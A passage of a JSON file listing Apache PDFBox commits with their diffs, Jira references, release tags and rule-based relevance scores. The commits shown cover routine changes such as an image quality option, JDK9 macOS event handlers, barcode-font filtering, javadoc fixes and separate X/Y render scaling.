    ", - " More information about AFM files can be found at", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/cos/package.html b/pdfbox/src/main/java/org/apache/pdfbox/cos/package.html", - "index 5c4fd8946..67e41187c 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/cos/package.html", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/cos/package.html", - "@@ -23,3 +23,3 @@", - " These are the low level objects that make up a PDF document.", - "-

    ", - "+

    " - ], - "changed_files": [ - "examples/src/main/java/org/apache/pdfbox/examples/ant/package.html", - "fontbox/src/main/java/org/apache/fontbox/afm/package.html", - "pdfbox/src/main/java/org/apache/pdfbox/cos/package.html" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4112": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "ebe874e6d4e86eb4cbd00122d9c6ca87d9baf107" - ], - [ - "no-tag", - "35487547ec8778314a3b9802cf734769b03d9292" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4112", - "relevance": 2 - } - ] - }, - { - "commit_id": "7a146884d4a177f2e3e838237028f2f66401e317", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1523125977, - "hunks": 7, - "message": "PDFBOX-4186: add quality option to pdfbox-app, as suggested by Martin Hausner git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1828603 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java b/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java", - "index 9b1adaa6f..ffb24dacc 100644", - "--- a/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java", - "+++ b/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java", - "@@ -51,2 +51,3 @@ public final class PDFToImage", - " private static final String DPI = \"-dpi\";", - "+ private static final String QUALITY = \"-quality\";", - " private static final String CROPBOX = \"-cropbox\";", - "@@ -93,2 +94,3 @@ public final class PDFToImage", - " int dpi;", - "+ float quality = 1.0f;", - " float cropBoxLowerLeftX = 0;", - "@@ -165,2 +167,7 @@ public final class PDFToImage", - " }", - "+ else if( args[i].equals( QUALITY ) )", - "+ {", - "+ i++;", - "+ quality = Float.parseFloat(args[i]);", - "+ }", - " else if( args[i].equals( CROPBOX ) )", - "@@ -248,3 +255,3 @@ public final class PDFToImage", - " String fileName = outputPrefix + (i + 1) + \".\" + imageFormat;", - "- success &= ImageIOUtil.writeImage(image, fileName, dpi);", - "+ success &= ImageIOUtil.writeImage(image, fileName, dpi, quality);", - " }", - "@@ -291,4 +298,4 @@ public final class PDFToImage", - " + \" -endPage : The last page to extract(inclusive)\\n\"", - "- + \" -color : The color depth (valid: bilevel, gray, rgb, rgba)\\n\"", - "- + \" -dpi : The DPI of the output image\\n\"", - "+ + \" -color : The color depth (valid: bilevel, gray, rgb (default), rgba)\\n\"", - "+ + \" -quality : The quality to be used when compressing the image (0 < quality <= 1 (default))\\n\"", - " + \" -cropbox : The page area to export\\n\"", - "diff --git a/tools/src/main/java/org/apache/pdfbox/tools/imageio/ImageIOUtil.java b/tools/src/main/java/org/apache/pdfbox/tools/imageio/ImageIOUtil.java", - "index 115041047..d3fa60cfb 100644", - "--- a/tools/src/main/java/org/apache/pdfbox/tools/imageio/ImageIOUtil.java", - "+++ b/tools/src/main/java/org/apache/pdfbox/tools/imageio/ImageIOUtil.java", - "@@ -66,2 +66,21 @@ public final class ImageIOUtil", - " int dpi) throws IOException", - "+ {", - "+ return writeImage(image, filename, dpi, 1.0f);", - "+ }", - "+", - "+ /**", - "+ * Writes a buffered image to a file using the given image format.", - "+ * See {@link #writeImage(BufferedImage image, String formatName,", - "+ * OutputStream output, int dpi, float quality)} for more details.", - "+ *", - "+ * @param image the image to be written", - "+ * @param filename used to construct the filename for the individual image. Its suffix will be", - "+ * used as the image format.", - "+ * @param dpi the resolution in dpi (dots per inch) to be used in metadata", - "+ * @param quality quality to be used when compressing the image (0 < quality < 1.0f)", - "+ * @return true if the image file was produced, false if there was an error.", - "+ * @throws IOException if an I/O error occurs", - "+ */", - "+ public static boolean writeImage(BufferedImage image, String filename,", - "+ int dpi, float quality) throws IOException", - " {", - "@@ -72,3 +91,3 @@ public final class ImageIOUtil", - " String formatName = filename.substring(filename.lastIndexOf('.') + 1);", - "- return writeImage(image, formatName, output, dpi);", - "+ return writeImage(image, formatName, output, dpi, quality);", - " }" - ], - "changed_files": [ - "tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java", - "tools/src/main/java/org/apache/pdfbox/tools/imageio/ImageIOUtil.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4186": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "8bbe2b26a1d95134a77fdbab3860d067b99fca3b" - ] - ], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4186", - "relevance": 2 - } - ] - }, - { - "commit_id": "9de7202b151168b9502059980fda6cc55aa32d56", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1531850440, - "hunks": 16, - "message": "PDFBOX-4013: support MacOS features on jdk9, by Emmeran Seehuber git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1836123 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java b/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", - "index a9017b4c8..66683311f 100644", - "--- a/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", - "+++ b/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", - "@@ -47,3 +47,2 @@ import java.util.Properties;", - " import java.util.Set;", - "-import java.util.StringTokenizer;", - " import javax.imageio.spi.IIORegistry;", - "@@ -452,6 +451,17 @@ public class PDFDebugger extends JFrame", - "+ initGlobalEventHandlers();", - "+", - "+ }", - "+", - "+ /**", - "+ * Initialise application global event handlers.", - "+ * Protected to allow subclasses to override this method if they", - "+ * don't want the global event handler overridden.", - "+ */", - "+ @SuppressWarnings(\"WeakerAccess\")", - "+ protected void initGlobalEventHandlers()", - "+ {", - " // Mac OS X file open/quit handler", - "- if (IS_MAC_OS && !isMinJdk9())", - "+ if (IS_MAC_OS)", - " {", - "- //TODO this needs to be rewritten for JDK9, see PDFBOX-4013", - " try", - "@@ -567,7 +577,4 @@ public class PDFDebugger extends JFrame", - "- if (!IS_MAC_OS)", - "- {", - "- fileMenu.addSeparator();", - "- fileMenu.add(printMenuItem);", - "- }", - "+ fileMenu.addSeparator();", - "+ fileMenu.add(printMenuItem);", - "@@ -730,3 +737,3 @@ public class PDFDebugger extends JFrame", - " {", - "- readPDFFile(openDialog.getFile(), \"\");", - "+ readPDFFile(new File(openDialog.getDirectory(),openDialog.getFile()), \"\");", - " }", - "@@ -1175,3 +1182,3 @@ public class PDFDebugger extends JFrame", - "- private void exitMenuItemActionPerformed(ActionEvent evt)", - "+ private void exitMenuItemActionPerformed(ActionEvent ignored)", - " {", - "@@ -1193,2 +1200,12 @@ public class PDFDebugger extends JFrame", - " }", - "+ performApplicationExit();", - "+ }", - "+", - "+ /**", - "+ * Exit the application after the window is closed. This is protected to", - "+ * let subclasses override the behavior.", - "+ */", - "+ @SuppressWarnings(\"WeakerAccess\")", - "+ protected void performApplicationExit()", - "+ {", - " System.exit(0);", - "@@ -1249,19 +1266,3 @@ public class PDFDebugger extends JFrame", - " {", - "- if( document != null )", - "- {", - "- try", - "- {", - "- document.close();", - "- if (!currentFilePath.startsWith(\"http\"))", - "- {", - "- recentFiles.addFile(currentFilePath);", - "- }", - "- recentFiles.close();", - "- }", - "- catch( IOException e )", - "- {", - "- throw new RuntimeException(e);", - "- }", - "- }", - "- System.exit(0);", - "+ exitMenuItemActionPerformed(null);", - " }", - "@@ -1496,24 +1497,2 @@ public class PDFDebugger extends JFrame", - " }", - "- ", - "- private static boolean isMinJdk9()", - "- {", - "- // strategy from lucene-solr/lucene/core/src/java/org/apache/lucene/util/Constants.java", - "- String version = System.getProperty(\"java.specification.version\");", - "- final StringTokenizer st = new StringTokenizer(version, \".\");", - "- try", - "- {", - "- int major = Integer.parseInt(st.nextToken());", - "- int minor = 0;", - "- if (st.hasMoreTokens())", - "- {", - "- minor = Integer.parseInt(st.nextToken());", - "- }", - "- return major > 1 || (major == 1 && minor >= 9);", - "- }", - "- catch (NumberFormatException nfe)", - "- {", - "- // maybe some new numbering scheme in the 22nd century", - "- return true;", - "- }", - "- }", - " }", - "diff --git a/debugger/src/main/java/org/apache/pdfbox/debugger/ui/OSXAdapter.java b/debugger/src/main/java/org/apache/pdfbox/debugger/ui/OSXAdapter.java", - "index 2ed504ef4..5b24bfa82 100644", - "--- a/debugger/src/main/java/org/apache/pdfbox/debugger/ui/OSXAdapter.java", - "+++ b/debugger/src/main/java/org/apache/pdfbox/debugger/ui/OSXAdapter.java", - "@@ -20,3 +20,3 @@", - " * This file includes code under the following terms:", - "- * \t\t\t", - "+ *", - " * Version: 2.0", - "@@ -66,2 +66,4 @@ package org.apache.pdfbox.debugger.ui;", - "+import java.awt.Desktop;", - "+import java.io.File;", - " import java.lang.reflect.InvocationHandler;", - "@@ -70,2 +72,4 @@ import java.lang.reflect.Method;", - " import java.lang.reflect.Proxy;", - "+import java.util.StringTokenizer;", - "+import java.util.List;", - "@@ -89,2 +93,24 @@ public class OSXAdapter implements InvocationHandler", - " static Object macOSXApplication;", - "+ ", - "+ private static boolean isMinJdk9()", - "+ {", - "+ // strategy from lucene-solr/lucene/core/src/java/org/apache/lucene/util/Constants.java", - "+ String version = System.getProperty(\"java.specification.version\");", - "+ final StringTokenizer st = new StringTokenizer(version, \".\");", - "+ try", - "+ {", - "+ int major = Integer.parseInt(st.nextToken());", - "+ int minor = 0;", - "+ if (st.hasMoreTokens())", - "+ {", - "+ minor = Integer.parseInt(st.nextToken());", - "+ }", - "+ return major > 1 || (major == 1 && minor >= 9);", - "+ }", - "+ catch (NumberFormatException nfe)", - "+ {", - "+ // maybe some new numbering scheme in the 22nd century", - "+ return true;", - "+ }", - "+ }", - "@@ -92,3 +118,38 @@ public class OSXAdapter implements InvocationHandler", - " // The method passed should return a boolean stating whether or not the quit should occur", - "- public static void setQuitHandler(Object target, Method quitHandler) {", - "+ public static void setQuitHandler(final Object target, final Method quitHandler)", - "+ {", - "+ if (isMinJdk9())", - "+ {", - "+ try", - "+ {", - "+ Desktop desktopObject = Desktop.getDesktop();", - "+ Class filesHandlerClass = Class.forName(\"java.awt.desktop.QuitHandler\");", - "+ final Method setQuitHandlerMethod = desktopObject.getClass().getMethod(\"setQuitHandler\", filesHandlerClass);", - "+ Object osxAdapterProxy = Proxy.newProxyInstance(OSXAdapter.class.getClassLoader(),", - "+ new Class[]", - "+ {", - "+ filesHandlerClass", - "+ }, new InvocationHandler()", - "+ {", - "+ @Override", - "+ public Object invoke(Object proxy, Method method, Object[] args)", - "+ throws Throwable", - "+ {", - "+ if (!method.getName().equals(\"handleQuitRequestWith\"))", - "+ {", - "+ return null;", - "+ }", - "+ // We just call our own quit handler", - "+ quitHandler.invoke(target);", - "+ return null;", - "+ }", - "+ });", - "+ setQuitHandlerMethod.invoke(desktopObject, osxAdapterProxy);", - "+ }", - "+ catch (Exception e)", - "+ {", - "+ e.printStackTrace();", - "+ }", - "+ return;", - "+ }", - " setHandler(new OSXAdapter(\"handleQuit\", target, quitHandler));", - "@@ -135,3 +196,49 @@ public class OSXAdapter implements InvocationHandler", - " // application bundle's Info.plist", - "- public static void setFileHandler(Object target, Method fileHandler) {", - "+ public static void setFileHandler(Object target, Method fileHandler)", - "+ {", - "+ if (isMinJdk9())", - "+ {", - "+ try", - "+ {", - "+ Desktop desktopObject = Desktop.getDesktop();", - "+ Class filesHandlerClass = Class.forName(\"java.awt.desktop.OpenFilesHandler\");", - "+ Method setOpenFileHandlerMethod = desktopObject.getClass().getMethod(\"setOpenFileHandler\", filesHandlerClass);", - "+ Object osxAdapterProxy = Proxy.newProxyInstance(OSXAdapter.class.getClassLoader(),", - "+ new Class[]", - "+ {", - "+ filesHandlerClass", - "+ }, new OSXAdapter(\"openFiles\", target, fileHandler)", - "+ {", - "+ // Override OSXAdapter.callTarget to send information on the", - "+ // file to be opened", - "+ public boolean callTarget(Object openFilesEvent)", - "+ {", - "+ if (openFilesEvent != null)", - "+ {", - "+ try", - "+ {", - "+ Method getFilesMethod = openFilesEvent.getClass().getDeclaredMethod(\"getFiles\",", - "+ (Class[]) null);", - "+ @SuppressWarnings(\"unchecked\")", - "+ List files = (List) getFilesMethod.invoke(openFilesEvent,", - "+ (Object[]) null);", - "+ this.targetMethod.invoke(this.targetObject, files.get(0).getAbsolutePath());", - "+ }", - "+ catch (Exception ex)", - "+ {", - "+ throw new RuntimeException(ex);", - "+ }", - "+ }", - "+ return true;", - "+ }", - "+ });", - "+ setOpenFileHandlerMethod.invoke(desktopObject, osxAdapterProxy);", - "+ }", - "+ catch (Exception e)", - "+ {", - "+ e.printStackTrace();", - "+ }", - "+ return;", - "+ }", - "+ /* JDK <= 1.8, using Apple classes */", - " setHandler(new OSXAdapter(\"handleOpenFile\", target, fileHandler) {" - ], - "changed_files": [ - "debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", - "debugger/src/main/java/org/apache/pdfbox/debugger/ui/OSXAdapter.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4013": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "63d9c2cbff461d239993a40272938ea45dde6ffd" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4013", - "relevance": 2 - } - ] - }, - { - "commit_id": "51580f2fd7982d8a787dffb1242e93d27aa996f1", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1532022809, - "hunks": 2, - "message": "PDFBOX-4268: ignore barcode font if we aren't searching for one git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1836285 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/FontMapperImpl.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/FontMapperImpl.java", - "index e12ab49c6..549c3edd2 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/FontMapperImpl.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/FontMapperImpl.java", - "@@ -562,2 +562,10 @@ final class FontMapperImpl implements FontMapper", - " {", - "+ if (panose.getFamilyKind() == 0 && ", - "+ (info.getPostScriptName().toLowerCase().contains(\"barcode\") ||", - "+ info.getPostScriptName().startsWith(\"Code\")) && ", - "+ !probablyBarcodeFont(fontDescriptor))", - "+ {", - "+ // PDFBOX-4268: ignore barcode font if we aren't searching for one.", - "+ continue;", - "+ }", - " // serifs", - "@@ -626,2 +634,18 @@ final class FontMapperImpl implements FontMapper", - "+ private boolean probablyBarcodeFont(PDFontDescriptor fontDescriptor)", - "+ {", - "+ String ff = fontDescriptor.getFontFamily();", - "+ if (ff == null)", - "+ {", - "+ ff = \"\";", - "+ }", - "+ String fn = fontDescriptor.getFontName();", - "+ if (fn == null)", - "+ {", - "+ fn = \"\";", - "+ }", - "+ return ff.startsWith(\"Code\") || ff.toLowerCase().contains(\"barcode\") ||", - "+ fn.startsWith(\"Code\") || fn.toLowerCase().contains(\"barcode\");", - "+ }", - "+", - " /**" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/FontMapperImpl.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4268": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "28915170e0a89d632b5f0a83ddb0162e300dee8e" - ] - ], - "tags": [ - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4268", - "relevance": 2 - } - ] - }, - { - "commit_id": "011f6684cca6b23b90412882ba1bad61135e8720", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1523126756, - "hunks": 1, - "message": "PDFBOX-4186: restore and improve dpi usage git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1828607 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java b/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java", - "index ffb24dacc..597958353 100644", - "--- a/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java", - "+++ b/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java", - "@@ -299,2 +299,3 @@ public final class PDFToImage", - " + \" -color : The color depth (valid: bilevel, gray, rgb (default), rgba)\\n\"", - "+ + \" -dpi : The DPI of the output image, default: screen resolution or 96 if unknown\\n\"", - " + \" -quality : The quality to be used when compressing the image (0 < quality <= 1 (default))\\n\"" - ], - "changed_files": [ - "tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4186": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "1d7625a5faf0b329a69a15e8fea8b3b8044009eb" - ] - ], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4186", - "relevance": 2 - } - ] - }, - { - "commit_id": "c203f812d7c0fb471244889eb4e7a7a6851c002d", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1525171203, - "hunks": 5, - "message": "PDFBOX-4057: allow rendering with different X and Y scale as proposed by Cornelis Hoeflake git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1830667 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/rendering/PDFRenderer.java b/pdfbox/src/main/java/org/apache/pdfbox/rendering/PDFRenderer.java", - "index 3fce14fa1..ee2a988cd 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/rendering/PDFRenderer.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/rendering/PDFRenderer.java", - "@@ -219,3 +219,3 @@ public class PDFRenderer", - "- transform(g, page, scale);", - "+ transform(g, page, scale, scale);", - "@@ -264,2 +264,17 @@ public class PDFRenderer", - " throws IOException", - "+ {", - "+ renderPageToGraphics(pageIndex, graphics, scale, scale);", - "+ }", - "+", - "+ /**", - "+ * Renders a given page to an AWT Graphics2D instance.", - "+ * ", - "+ * @param pageIndex the zero-based index of the page to be converted", - "+ * @param graphics the Graphics2D on which to draw the page", - "+ * @param scaleX the scale to draw the page at for the x-axis", - "+ * @param scaleY the scale to draw the page at for the y-axis", - "+ * @throws IOException if the PDF cannot be read", - "+ */", - "+ public void renderPageToGraphics(int pageIndex, Graphics2D graphics, float scaleX, float scaleY)", - "+ throws IOException", - " {", - "@@ -268,3 +283,3 @@ public class PDFRenderer", - "- transform(graphics, page, scale);", - "+ transform(graphics, page, scaleX, scaleY);", - "@@ -280,5 +295,5 @@ public class PDFRenderer", - " // scale rotate translate", - "- private void transform(Graphics2D graphics, PDPage page, float scale)", - "+ private void transform(Graphics2D graphics, PDPage page, float scaleX, float scaleY)", - " {", - "- graphics.scale(scale, scale);", - "+ graphics.scale(scaleX, scaleY);" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/rendering/PDFRenderer.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4057": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "855bfb5360d114715e3785a59aa48b5c664b602b" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4057", - "relevance": 2 - } - ] - }, - { - "commit_id": "412ae902bd7383e1367d325cf2d18404f747a86c", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1529946800, - "hunks": 8, - "message": "PDFBOX-4241: clarify in javadoc that output stream will be closed git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1834348 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdfwriter/COSWriter.java b/pdfbox/src/main/java/org/apache/pdfbox/pdfwriter/COSWriter.java", - "index b785360cd..a90a5e3a2 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdfwriter/COSWriter.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdfwriter/COSWriter.java", - "@@ -222,5 +222,6 @@ public class COSWriter implements ICOSVisitor, Closeable", - " /**", - "- * COSWriter constructor comment.", - "+ * COSWriter constructor.", - " *", - "- * @param outputStream The wrapped output stream.", - "+ * @param outputStream The output stream to write the PDF. It will be closed when this object is", - "+ * closed.", - " */", - "@@ -233,7 +234,8 @@ public class COSWriter implements ICOSVisitor, Closeable", - " /**", - "- * COSWriter constructor for incremental updates. ", - "+ * COSWriter constructor for incremental updates.", - " *", - "- * @param outputStream output stream where the new PDF data will be written", - "+ * @param outputStream output stream where the new PDF data will be written. It will be closed", - "+ * when this object is closed.", - " * @param inputData random access read containing source PDF data", - "- * ", - "+ *", - " * @throws IOException if something went wrong", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java", - "index c3f0a60e4..956916d94 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java", - "@@ -1254,5 +1254,5 @@ public class PDDocument implements Closeable", - " * This will save the document to an output stream.", - "- * ", - "- * @param output The stream to write to. It is recommended to wrap it in a", - "- * {@link java.io.BufferedOutputStream}, unless it is already buffered.", - "+ *", - "+ * @param output The stream to write to. It will be closed when done. It is recommended to wrap", - "+ * it in a {@link java.io.BufferedOutputStream}, unless it is already buffered.", - " *", - "@@ -1290,3 +1290,4 @@ public class PDDocument implements Closeable", - " *", - "- * @param output stream to write. It should not point to the source file.", - "+ * @param output stream to write to. It will be closed when done. It should not", - "+ * point to the source file.", - " * @throws IOException if the output could not be written", - "@@ -1346,3 +1347,4 @@ public class PDDocument implements Closeable", - " *", - "- * @param output stream to write final PDF. It should not point to the source file.", - "+ * @param output stream to write the final PDF. It should not point to the source", - "+ * file. It will be closed when the document is closed.", - " * @return instance to be used for external signing and setting CMS signature" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdfwriter/COSWriter.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4241": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "e7630469a13b32f919ee919af14ebb78b3d217b5" - ] - ], - "tags": [ - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4241", - "relevance": 2 - } - ] - }, - { - "commit_id": "0d5c9b86a9a2935920170233722c06a3846d65eb", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1527098434, - "hunks": 3, - "message": "PDFBOX-4095: implement non separable blend modes (hue, saturation, color, luminosity), by Savan Patel and Jani Pehkonen git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1832117 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendComposite.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendComposite.java", - "index 8907f01f2..c1596f0b1 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendComposite.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendComposite.java", - "@@ -1,228 +1,274 @@", - "-/*", - "- * Licensed to the Apache Software Foundation (ASF) under one or more", - "- * contributor license agreements. See the NOTICE file distributed with", - "- * this work for additional information regarding copyright ownership.", - "- * The ASF licenses this file to You under the Apache License, Version 2.0", - "- * (the \"License\"); you may not use this file except in compliance with", - "- * the License. You may obtain a copy of the License at", - "- *", - "- * http://www.apache.org/licenses/LICENSE-2.0", - "- *", - "- * Unless required by applicable law or agreed to in writing, software", - "- * distributed under the License is distributed on an \"AS IS\" BASIS,", - "- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "- * See the License for the specific language governing permissions and", - "- * limitations under the License.", - "- */", - "-package org.apache.pdfbox.pdmodel.graphics.blend;", - "-", - "-import java.awt.AlphaComposite;", - "-import java.awt.Composite;", - "-import java.awt.CompositeContext;", - "-import java.awt.RenderingHints;", - "-import java.awt.color.ColorSpace;", - "-import java.awt.image.ColorModel;", - "-import java.awt.image.Raster;", - "-import java.awt.image.WritableRaster;", - "-import org.apache.commons.logging.Log;", - "-import org.apache.commons.logging.LogFactory;", - "-", - "-/**", - "- * AWT composite for blend modes.", - "- * ", - "- * @author K\u00c3\u00bchn & Weyh Software GmbH", - "- */", - "-public final class BlendComposite implements Composite", - "-{", - "- /**", - "- * Log instance.", - "- */", - "- private static final Log LOG = LogFactory.getLog(BlendComposite.class);", - "-", - "- /**", - "- * Creates a blend composite", - "- *", - "- * @param blendMode Desired blend mode", - "- * @param constantAlpha Constant alpha, must be in the inclusive range", - "- * [0.0...1.0] or it will be clipped.", - "- * @return a blend composite.", - "- */", - "- public static Composite getInstance(BlendMode blendMode, float constantAlpha)", - "- {", - "- if (constantAlpha < 0)", - "- {", - "- LOG.warn(\"using 0 instead of incorrect Alpha \" + constantAlpha);", - "- constantAlpha = 0;", - "- }", - "- else if (constantAlpha > 1)", - "- {", - "- LOG.warn(\"using 1 instead of incorrect Alpha \" + constantAlpha);", - "- constantAlpha = 1;", - "- }", - "- if (blendMode == 